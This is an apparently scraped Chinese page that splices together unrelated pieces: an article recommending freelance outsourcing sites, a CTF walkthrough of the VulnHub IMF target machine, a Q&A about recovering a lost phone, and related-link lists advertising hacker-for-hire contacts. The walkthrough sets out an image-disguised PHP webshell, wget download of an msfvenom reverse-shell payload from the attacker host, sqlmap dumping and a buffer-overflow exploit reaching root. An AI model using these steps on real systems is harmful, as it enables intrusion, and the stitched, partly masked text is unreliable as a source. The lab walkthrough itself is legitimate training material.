渗透测试接单平台「有没有黑客能找回丢失的手机」

访客4年前黑客资讯1089

  原标题:6个接私活的网站,你有技术就有钱!

  作者:发哥

  链接:GitHubDaily

  本篇文章会向大家推荐国内外几个接外包比较靠谱的平台,主旨是贵精不贵多。因此,像「猪x戒」这种会让程序员自贬身价,扰乱市场规则的网站,便不会出现在下方推荐列表中。

  下面开始进入正题。

  国外篇

  如果你打算接国外的软件外包,以下几点能力更好提前掌握:

  基本的英语沟通能力(能跟阿三哥沟通)

  良好的统筹规划能力(考虑好时差因素)

  财务管理能力(报税、回款周期管理)

  freelancer

  freelancer.com

  如果你打算进军国外的外包行业,与阿三哥竞争,那不论如何都绕不开 freelancer 这个网站。

  排在首位的 freelancer,目前是全球影响力更大的自由职业与众包平台,公司创办于 2010 年,总部位于澳大利亚悉尼,员工遍布 240+ 个国家,拥有 4000+ 万的雇主与自由职业者。从软件设计、开发、测试到营销、会计、法律服务,你都能在上面找到对应的合作方,其业务覆盖范围不可谓不广。

  另外,财大气粗的 freelancer 还在不断收购一些比较优质的外包市场,进一步扩大自己的规模,慢慢蚕食着整个市场。

  不过,作为上市公司的 freelancer,近半年的公司股价却在持续走低... 具体原因在此就不多做分析了,毕竟 GitHubDaily 公众号不是荐股平台。

  仅从平台规模与市场占比上看,freelancer 是集聚了当今世界上诸多优秀自由职业者的接单平台,如果你打算在该平台上发展,更好是对个人的综合能力有充分自信。

  upwork

  upwork 前身为 Elance-oDesk,作为 freelancer 的主要竞争对手,两者经常会被人拿来做对比。

  该公司于 1999 年前后成立,创始人皆为麻省理工毕业生,或许是为了适应信息科技这个瞬息万变的行业,该公司前前后后总共改了 4 次名(Elance、oDesk、Elance-oDesk、Upwork),是个不折不扣的改名狂魔...

  现总部位于美国加利福尼亚的圣克拉拉,在线上平台累积有 1200 万自由职业者与 500 万客户注册,估值 10 亿美元,是现如今全球估值更高的自由职业对接平台。

  与 freelancer 一样,该平台上也为多种不同行业提供服务,而不仅局限于软件外包。诸如微软、Airbnb 等知名企业,都跟 upwork 有过合作。

  各项数据表明,upwork 的规模并不逊于 freelancer,「广撒网、多敛鱼,择优而从之」,想要接到更多高质量的单子,就不要仅局限于一个平台。

  Fiverr

  同 freelancer 一样,Fiverr 也创建于 2010 年,不同的是,该公司经营业务较小,主打写作、翻译、图形设计、视频剪辑、软件编程。

  但比较牛逼的是,Fiverr 在创建仅 3 年时,就成为全美排名前 100,全球排名前 200 的主流网站,并在下一年,成功拿到了 3000 万美元的投资,以迅雷不及掩耳之势快速占领市场。最终,在 2019 年 6 月,登上 NYSE(纽约证券交易所)。

  虽说 Fiverr 的服务范围并不是特别广,但是他们家对软件编程这一块领域,划分的倒是颇为详细:

  由上图我们可以看到,从网站建站、移动端 & 桌面 App 开发,再到数据分析、用户测试,应有尽有,只要你是从事软件专业的开发者,在上面就有你的一席之地。

  所以,对自己的技术堆栈做好评估,躁起来吧!

  国内篇

  介绍完国外的主流接单平台,我们再来聊聊国内的。

  面向国内企业接单,主要好处就是对英语沟通能力的要求没那么高,不过客户屁事多,不懂装懂,需求来回改,喜欢瞎 bb,回款周期长的问题也普遍存在。

  因此,我个人觉得,面向国内市场接单,在你基本技术能力都满足的情况下,下面这项能力应该是你最需要重视的:

  商务沟通能力(管理好客户的心理预期)

  倘若管理不好客户心理预期,项目就容易出问题。最常见的情况,就是信息不对称:客户认为钱给多了,你活干少了;或者你活干了一堆,却见不到具体产出物等等。

  类似这样的坑,还有一堆。限于篇幅,就不在此细聊了,我后面会新开篇文章跟大家分享。

  下面我们接着回来聊聊国内几个比较靠谱接单平台。

  码市

  要聊「码市」,就得先聊 Coding,作为国内首个一站式云端软件服务平台,你可以简单把 Coding 理解为中国版 GitHub,尽管他们志向并不在于此。

  Coding 于 2014 年 2 月在深圳成立,目前共拥有 100 万用户,7000+ 企业,170 万托管项目,获得各大资本融资累计 2500 万美元。

  我个人应该是 2015 年前后接触的 Coding,那会主要是被他们网站清新优雅的 UI 所折服,因为 Coding 是国内为数不多使用 Semantic UI 进行前端开发的产品之一。在 Bootstrap 被广泛应用的时代,选用一款刚诞生不久,且仍处于测试版的前端框架需要颇大的勇气。

  几年前,有幸拜读了 Coding 创始人张海龙写的几篇文章,其中包括「如何给软件开发项目估价?」,「为什么要做一个好的甲方」,「重塑按需经济时代的软件外包」等多篇与软件外包相关的文章。

  读完后,深受启发,认为张老板应该是对国内外包行业认知较为独特的那一小撮人。文章链接我已放到 GitHubDaily 公众号后台,想要阅读的同学,可在后台回复关键词「张海龙」或「ZHL」,内容都写的不错,建议大家看看。

  Coding 旗下的一款产品:码市,就是 Coding 的创始人牵头搞起来的,专注于做互联网软件外包服务平台。目前在该平台上,累积对接外包金额 3 亿多人民币,1 万多个项目,15 万开发者。

  15 年起步,至今 4 年多时间,仅凭平台资源便能做到这个成绩,确实不简单。

  两年前我曾在 Coding 上发布过项目,也尝试着接单,不过限于平台特殊的评价机制,双方合作都没有谈下,最终还是选择了线下的合作伙伴。具体平台的人才筛选及评估机制,在其官网都有详细的文档说明,在此就不多做赘述了。

  如果你想在上面接单,可以在平台上面完善个人信息,并提交申请,等平台派单。不过当中的不确定性因素太多,有点类似守株待兔,更好的方式还是得去主动寻找客户,到平台上给需求方写投标书。至于能不能中标,那就看个人或团队的综合素质能力了。

  开源众包

  「垂直技术社区 10 年沉淀 350 万 + 活跃开发者 海量行为数据智能匹配」,打开其官网,首先引入眼帘的便是这句话。

  得益于「开源中国」这个开发者社区流量的支持,他们旗下的「开源众包」产品发展迅猛,外包服务做得风生水起。

  目前该平台没有过多对外透露外包成交金额,不过从我上网搜索到的数据表明,该平台在 2016 年年底,仅上线一年,交易额便成功突破了 4000 万人民币。倘若再加上每年的稳定增长,该平台至今的总流水应该不逊色于 Coding 的「码市」。

  另外,由官网数据可知,他们平台上开发商的数量级也颇为恐怖:

  流水大,那单子自然不会少,官网上有个外包项目的搜索入口,没事多上去逛逛,兴许能碰到合你胃口的外包也说不定。

  程序员客栈

  最后,跟大家聊聊「程序员客栈」这款产品。

  没记错的话,程序员客栈一开始应该是做程序员人才对接相关的网站。开发者可以在平台上完善个人简历,创业者到上面勾搭技术人员,大家一起合作创业。后来,兴许是他们创始人嗅到了这当中的商机,将其改成了软件外包对接平台。

  项目早期启动时,大概是 2015 年,那会我还在读大二,有幸收到他们创始人邀请入驻的邮件,便登上他们官网看了看,而后发觉其网站编辑器 UI 做的还颇为简陋,便随口提了下建议:可替换为 Tower 出品的开源编辑器 Simditor 来实现,没想到最终建议被采纳。对于当时的我,内心还是有一丝小窃喜的。

  到了后面,我开始工作,每天忙于写代码,学习新技术,便对程序员客栈减少了关注。另我没想到的是,在近几年这种异常艰难的创业环境下,他们仍披荆斩棘,一步一步杀出一条血路,活到了今天。对此,我心中充满敬意。

  程序员客栈当前累积注册开发者近 40 万,覆盖多个技术领域,各种社会稀缺人才、大厂工程师,都能在上面找到。只要有钱,他们都将为你所用。

  如果你能接到外包,却苦于技术无法实现,那不妨到上面去雇佣技术人员,相信这应该是效率更高的解决方案。

  我的公司之前曾经跟平台上的程序员有过多次合作,几次下来,总体还算顺利,唯一不足之处在于,部分开发者是 *** 做项目,白天要忙工作,只能晚上或周六日做项目,因此有时候反馈问题速度比较慢,两头来回跑的话,有些工作细节也处理不到位。

  这一点也是大家要注意的,如果是你 *** 做外包,那更好是保证在本职工作之余,能留下充足的空闲时间,否则最终结果可能是丢了工作,做砸外包。

  写在最后

  随着这几年信息技术的大爆炸,许多软件接单平台也如雨后春笋般冒出,其中自然也不缺少一些高品质的网站,但限于文章篇幅,在此不便一一列出,因此只选出几个比较有代表性的平台,供大家参考挑选,如果你有接触过其他比较好的平台,也欢迎在评论区多多交流,大家互相学习。

  最后,我想再占用文章一点篇幅,聊聊做外包需要注意的一些事情。

  「天下熙熙皆为利来,天下攘攘皆为利往」,钱财所到之处,必然人头攒动、摩肩接踵。软件外包这一行业也不例外,当大家躬身入局之时,定会发现存在僧多肉少的尴尬局面。

  要避免这种尴尬局面,你就得尽可能去拓展更多的外包接单渠道,除了上面我所提到的 6 个网站之外,你应该再深入渗透,深挖整个软件外包行业,去接触更多外包平台,连接更多能给你带来客户的人。

  与此同时,也不要忘记个人品牌的构建,因为到了最后,你会发现,软件外包能带来的价值有限,个人品牌才是你更大的资本。

  另外,还请记住下面这句话:

  软件外包行业,客户资源永远是你最宝贵的财富。

  当你手头上有一大批优质外包客户的时候,你已经可以不用通过出售自己的时间来赚钱了。雇佣优秀人才,来负责外包业务的具体开发,你抽身出来,负责与客户关系的维护,探索更多与客户更多合作关系,如:软件版权出售、产品定期技术维护 & 问题咨询等等。

  这样,才是做外包的正确方式,也是跳出码农死循环的更佳途径。

  原创:?kid?

  18年毕业,目前某安全公司PM搬砖,但依然钟情于渗透,希望能通过学习不断提高自己的技术。因为一开始研究的是渗透,但还是太菜。大佬师傅当小说看就好。

  目前实战操作来源vunlhub及handthebox,均须爬楼,我是自己搭的楼梯。Guge和油管以及推特都是很好的平台,油管上太多牛逼的人。。。

  CTF也会偶尔看,如果有师傅带着玩和打比赛,愿意跟着搬砖打杂。。

  靶机下载地址:

  主要知识点:常规的CTF找flag、 *** 图片木马、溢出漏洞、提权。

  靶机下载后vmware打开,Kalior parrot(UI很棒,工具很全)

  同一内网arp-scan–l、Netdiscover、Nmap都可以扫描到靶机地址。。但实际内网渗透,肯定没这么简单。

  Nmap-sV -p 1-10000 ip

  Nmap-A -v -T4 ip

  Nmap后面的参数可以有很多,也可以接脚本,用法太多了。

  实战应该用不到-A,一般以-sS,半扫描方式,不会轻易被发现,但靶机可以随便搞。

  Nmap扫描只有80端口apache

  然后可以进行跑目录,看有没有敏感的目录,比如上传点,比如后台登陆。

  网站需要进行简单信息收集,但靶机并没有那么多信息可以用,所以浏览网站,某些页面可能会有框架信息,cms信息,然后可以去查漏洞。

  网页如果有留言、搜索框,也会想到xss,sql注入等,靶机一般都会提示。

  比如conctacus 下面可以看到联系人,可能就是有价值的用户名。

  如果网站有留言有信息,也可以进行社工创造字典,用crew和john配合用户名爆破等等。

  跑目录可以用dirbuster,gobuster,也可以用脚本工具dirsearch

  访问contactus及源码,得到flag1:YWxsdGhlZmlsZXM=

  Base64解码得到allthefiles

  解码方式太多了,网站在线解密、工具解密或者直接命令解密:

  echo'密文'|base64 -d

  继续观察页面源码,其实常规CTF思路到处点 看F12和看看源码。。

  发现js文件有些端倪

  拼接前缀得到base64解码

  echo'ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==' |base64 -dflag2{aW1mYWRtaW5pc3RyYXRvcg==}

  再次解码得到:Flag3:{Imfadministrator}

  并不知道是什么。。。试了一会,发现可以访问之前跑目录是没有的,出现登陆页面

  之一反应是爆破,第二反应是注入手工orsqlmap,可惜搞不出来。

  之前contactus页面里有用户名,三个其中之一,我用的Rmichaels

  然后又查看源码后,发现提示

  估计是使用strcmp之类的来判断密码的。当strcmp的两个字符串参数相等的时候会返回0,但如果把string和array相比较的话,strcmp也会返回0。

  PHP会将此字段解释为数组,而不是字符串。这有时可能会混淆验证甚至字符串检查,如果其中一个输入是数组,strcmp则会返回NULL。

  F12修改,将源码里的修改成,使pass参数变成array数组。

  用户名用之前页面里的Rmichaels,密码任意。登陆提交后发现flag3,base64解码后得到提示:continueTOcms,点击cms如下:

  Cms页面链接点啊点,没用,源码也没有提示信息,只能看url

  php?pagname=

  试了试1’和//etc/passwd

  有错误回显,貌似有注入点,本人比较菜,放弃手工

  复制cookie信息然后使用sqlmap测试,

  Sqlmap-u “ --dump –batch

  Sqlmap-hh?可以看参数,如果post注入,需要body信息,确定是-rtxt 还是–data=“name=value”,这里是get注入。

  有东西,可以看到库名admin,表名pages被爆了出来。只有tutorials-incomplete不曾出现在cms里,访问发现一张带有二维码的图片,可以用下面网站解码或者直接微信扫一扫。。。

  获得flag4{dXB *** 2Fkcjk0Mi5waHA=},解码后得到提示:uploadr942.php

  Php文件名称,很兴奋。访问/imfadministrator/uploadr942.php就更开心了,得到上传点:

  接下来的思维,就太多了,上传的姿势太多了,基本是上传马,连接,得shell,提权。

  小马拉大马,得shell,或者数据库提权等。

  上传的要点是上传的文件路径,文件名,有的可以写进日志里。

  回归正题。尝试上传php,挡掉,发现图片格式可以, *** 图片木马。

  Jpg上传,发现,上传成功后,看源码有生成的文件名,当然真实的不可能暴漏出来,那太傻了,但这种随机生成文件名的 *** ,是防御的方式之一。

  echo'FFD8FFEo' | xxd -r -p > test.jpg

  echo'<?php phpinfo(); >' >> test.jpg

  跑目录可得/uploads路径

  Curl-v “文件名.jpg

  (Curl是很机灵的工具。。嗯也很实用的。。)发现没有反应,再传gif发现就可以执行,于是写出如下再上传:

  echo'FFD8FFEo' | xxd -r -p > test.gif

  echo'<?php echo `id`; ?>' >> test.gif再然后

  echo‘FFD8FFEo’| xxd -r -p >text.gif

  echo‘<?php ?$c_GET[‘c’]; echo `$c`; >’>>test.gif

  注意echo后是``。可以学一下php基础,类c语言,还是比较容易上手。

  c=ls可得flag5解码得agentservices,貌似是一个服务,先记下。

  之所以能gif执行php应该是.htaccess文件中写入了.php.gif。

  .htaccess是apache的分布式配置文件,总是被玩坏,解析漏洞如果配置错误,非常不安全。

  之后就是拿shell了,Wget攻击机的多功能的php,攻击机开一个apache

  Systemctlstart apache2.service

  这里用到msf生成木马,并接收shell。因为可能后面要传文件,这种的得到shell,传文件一度困扰我。。。ssh连接上可以用scp

  meterpreter,有download,upload。。。

  msfvenom-p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf >/var/

  在攻击机的网站目录下文件名为hack的木马并开启apache服务。

  然后url里可以赋予c不同参数命令,将生成的木马php下到靶机,触发并反弹shell

  c=wget+“http://攻击机ip/hack”

  c=chmod+777+hack赋予执行权限。

  c=执行。

  Msf里:

  useexploit/multi/handler

  Setpayloads?linux/x86/meterpreter/reverse_tcp

  Setlhsot

  Run得到shell

  其实这里的shell权限还是挺大,如果遇到限制的shell,如何绕过有限制shell,自行搜索。

  接下来就是提权了,关于提权的姿势太多了,推荐一本书吧,《 *** 攻防实战研究:漏洞与提权》是18年的新书,小兵师傅的宝典。

  一旦得到shell,linux的话,看进程端口,翻目录,找找有用的信息。/etc/passwd,万一有权限可以替换密码,定时任务提权,脚本提权。

  这里用到的是缓冲区溢出,关于堆栈溢出,关于寄存器,能学到很多东西。

  首先Flag5 提示agent服务,也看了进程,发现有个knock进程。

  关于knock进程:knock是一个端口敲服务器。它侦听以太网(或PPP)接口上的所有流量,寻找端口命中的特殊“敲门”序列。客户端通过将TCP(或UDP)数据包发送到服务器上的端口来进行这些端口命中。这个端口不需要打开-因为knockd在链路层级别监听,它会查看所有流量,即使它的目的地是封闭端口。当服务器检测到特定的端口命中序列时,它会运行在其配置文件中定义的命令。这可用于在防火墙中打开孔以便快速访问。

  也找一下agent服务,输入?whereisagent?得到结果:agent:/usr/local/bin/agent

  进入/usr/local/bin/目录发现还有一个叫access_codes的文件,打开后显示:

  SYN7482,8279,9467

  SYN,不知道的了解一下三次握手,tcp连接等等。

  于是用nmap扫一下,再全扫一边,发现7788端口打开。真的是“knock“一下

  发现是agent程序。关于获得agent的id *** 有两种,一个是Meterperterdownload下来在本地做测试;一个是shell里运行ltraceagent。

  关于itrace的介绍:

  数据包访问AgentID是”’48093572”’,输入正确ID后出现选项:

  缓冲区溢出7788端口的agent程序。

  有两个工具gdb和图形化edb。关于gdb,结尾会贴另一个大佬的写的文章,入门溢出。Meterperterdownload 下来

  这里我用了kali,因为溢出部分是后来做的,换了电脑,parrot在移动过程中,没启动起来。。。测试:edb--run agent也可以运行agent,在edb内搜索

  运行agent后,输入id,先选择3.submitreport进行测试:

  溢出的关键是找到溢出的地址,貌似叫,栈堆基址。使用一个名为pattern_create的方便的Kali工具,生成特殊字符,测试。

  运行/usr/share/metasploit-framework/tools/exploit/pattern_create.rb-l 1024来获取1024个测试字符,然后将字符复制到agent里。pattern_offset配套使用。

  /usr/share/metasploit-&ampshy;‐framework/tools/pattern_offset.rb-q 41366641

  [*]Exact match at offset 168

  发现程序在第168个字符处溢出,同时运行之后,发现程序崩溃

  猜想选择的值成功覆盖EIP

  A* 168(估计是EIP的位置)

  B* 4(认为是EIP)

  C* 500(可以转储shell代码的EIP之后的空格)。

  再生成A168+B4+C*1000的字符继续测试

  python-c'print“A”* 168 +“B”* 4 +“C”* 500'

  python可以在反弹shell中建立新的终端,也可以起一个简单的http服务,用处太多了。

  (在edb内,可以搜索操作码(插件>OpCodeSearcher>操作码搜索)。在这里我们可以看到E(R)AX- > E(R)IP包含对E(RAX)的调用。)42是B的十六进制

  MSFVenom提供-b开关。这是为了消除无用的字符。在这个例子中,删除了空字节0x00,因为它通常都会终止一个字符串。x0a是换行符,x0d是回车符,所以这两者都相当于命中返回,出现在shellcode的中间,就over了。。。

  msfvenom-p linux/x86/shell_reverse_tcp LHOST=192.168.190.1 LPORT=6666 -fpython -b "\x00\x0a\x0d" > imf.py

  之前的agentID被硬编码,在exp中别忘了48093572。编写exp:

  执行脚本,nc-nlvp?你设置的端口,然后执行如下,有shell回弹,root权限。

  所以最后一个标志是flag6{R2gwc3RQcm90MGMwbHM=},解码为Gh0stProt0c0ls。

  关于最后的溢出,我接触的很少,也在学习,可能写的很烂,给出的exp有可能复现不了,或者提权成功,我也试了很多。。。具体的溢出入门学习可参考如下文章

  我觉得渗透的思路是很重要的,然后不会的就多搜索,多记录。以后会整理handthebox或者其他渗透靶机,随缘更新。欢迎一起学习交流。感谢阅读。

  相关操作学习

  VulnHub渗透测试实战:通过VulnHub靶机练习,获得渗透测试相关的实战经验。

  注:如果学习实验合氏币不足,请扫下面二维码领取30合氏币!

  本文为合天原创,未经允许,严禁装载。

图片查看:  
查询分类:  记录记录排行
用户提问:  渗透测试接单平台
状态:  已解决
调查用时:  173小时

有没有黑客能找回丢失的手机

  大苹果吗?通过你手机的IMEI码可以查到你手机激活的ICCID,然后通过在查询网站上可以查到手机是否被刷机和再次激活,如果有就会产生新的ICCID,通过新的ICCID可以查出激活的手机卡的类型和个人信息,这些个人信息需要通过手机运营商查,之后报警就可以了, *** 上有提供合成追踪码服务,搜丢失手机找回应该可以搜到,谢谢采纳

  没有用的,现在的所谓找回手机功能都是嘘头,根本不实用的。比如 *** 手机管家有找回功能,如果偷手机的人把 *** 手机管家删掉了,还怎么找回呢?甚至刷手机系统,什么都没有了,还谈什么找回功能?

  我手机被偷了,但没找回,报警也没用

其他问题提问 相关问题回答
私人黑客联系方式微信 公司分子骗钱
黑客公司去哪找 优化工作操作
怎么联系黑客? *** 大全攻击
从哪里能找到黑客 手机优质生活
黑 *** 务平台 优化登录赚钱

相关文章

巴比客优烧烤加盟条件?条件不多轻松加盟

巴比客优烧烤加盟条件?条件不多轻松加盟

在这个不停变化的世界中任何事物都没有停止过,但是人类对于美食的追求一直都是从来没有变化的,大家对于美食总是保持着一种坚持,大家想着每天都可以品尝到美味的美食,这也就促进了餐饮行业的发展,而创业者更是看...

敲响警钟!澳2019年山火泰民我们结婚了停拍致超6万考拉死伤或流离失

  中新网12月7日电 据“中央社”报道,2019年夏天,澳大利亚野火肆虐。据世界自然基金会(WWF)估计,超6万只考拉在大火中丧命、受伤或流离失所,对一个已陷入危机的物种来说,这一数字令人极为不安。...

家庭摄像头被黑客TP(黑客入侵家里摄像头)

家庭摄像头被黑客TP(黑客入侵家里摄像头)

本文导读目录: 1、家里用网络摄像头,怎样才能有效防止被别人入侵? 2、家里安装了摄像头,该怎样保证摄像头没有被黑客入侵? 3、家用摄像头为什么容易被黑客“入侵” 4、摄像头被黑怎么办...

现在年轻人在百度创业前景好吗赚钱快吗?最吃香的项目马上致富

“有什么问题,找百度搜索”它是绝大多数中国网民数量的习惯用语了。我觉得,大家都了解,百度搜索自主创业于2000年,历经长达二十年的成长与发展趋势,早已变成数百万中国网民数量日常生活、工作中及其游戏娱乐...

heike,黑客手机定位联系方式,黑客免费找微信号

Desc: http://146.148.60.107:9991/有个用户登录页面 login.php blog导航栏里有个博客页面的链接,可是是灰色的无法点击也打不开 cookie有两个,PHPSE...

360定时关机怎么设置(360小助手有定时关机功能

360定时关机怎么设置(360小助手有定时关机功能

我们都知道我们的手机都有自动开关机的功能吧,我们的电脑也可以定时开关机的,而且和手机一样,能够设置不止一个开关机的时间,怎么设置定时关机?今天小编就来为大家介绍一下怎样使用360安全卫士来实现电脑的开...